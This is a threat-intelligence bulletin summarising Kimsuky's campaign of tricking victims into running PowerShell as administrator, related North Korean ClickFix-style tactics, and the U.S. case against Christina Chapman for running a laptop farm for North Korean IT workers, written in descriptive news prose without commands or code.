North Korean Hackers Exploit PowerShell Trick to Hijack Devices in New Cyberattack
North Korean threat actor Kimsuky has been observed employing a new social engineering tactic to trick victims into running malicious PowerShell commands as administrators. The attackers impersonate South Korean government officials, gradually building rapport with targets before sending a spear-phishing email containing a PDF attachment. To access the document, victims are directed to a registration link, which instructs them to open PowerShell with administrative privileges, copy a provided code snippet, and execute it. This code downloads a browser-based remote desktop tool from a remote server, along with a certificate containing a hardcoded PIN. Once executed, the system sends a web request to register the victim’s device using the certificate and PIN, granting the attackers remote access. Microsoft, which has tracked this activity since January 2025, notes that this method represents a departure from Kimsuky’s traditional tactics. Other North Korean-linked groups have also adopted similar compromise strategies, such as the Contagious Interview campaign, which tricks macOS users into executing malicious commands under the guise of fixing browser access issues for cameras and microphones. These tactics, along with the growing popularity of "ClickFix" methods, capitalize on user actions to bypass security protections, making them particularly effective.
In a separate but related case, U.S. authorities charged Arizona resident Christina Marie Chapman for facilitating a fraudulent IT employment scheme that enabled North Korean threat actors to infiltrate over 300 U.S. companies, including Fortune 500 firms, between October 2020 and October 2023. Chapman conspired with North Korean IT workers to steal the identities of U.S. citizens, submit falsified documents to the Department of Homeland Security, and secure remote jobs under false pretenses. To further the scheme, she operated a laptop farm from her residence, maintaining multiple laptops to create the illusion that the workers were based in the U.S., when in reality, they were connecting remotely from China and Russia. The operation generated over $17.1 million in illicit revenue, violating international sanctions. Chapman was arrested in May 2024, and authorities disclosed that her actions compromised more than 70 U.S. identities, led to the falsification of tax liabilities, and resulted in the transmission of false information to DHS on more than 100 occasions.
Security Officer Comments:
As U.S. law enforcement increases its scrutiny of these operations, North Korean IT workers have escalated their activities, moving beyond financial fraud to direct cyber threats. Reports indicate that some workers have engaged in data exfiltration and extortion, leveraging their access to company systems to steal proprietary information and hold it hostage. The FBI recently warned that after being discovered on corporate networks, these actors have threatened to release sensitive data unless ransom demands are met. In some cases, they have publicly leaked proprietary code, posing a significant security and financial risk to affected organizations.
Suggested Corrections:
Link(s):
https://thehackernews.com/2025/02/north-korean-hackers-exploit-powershell.html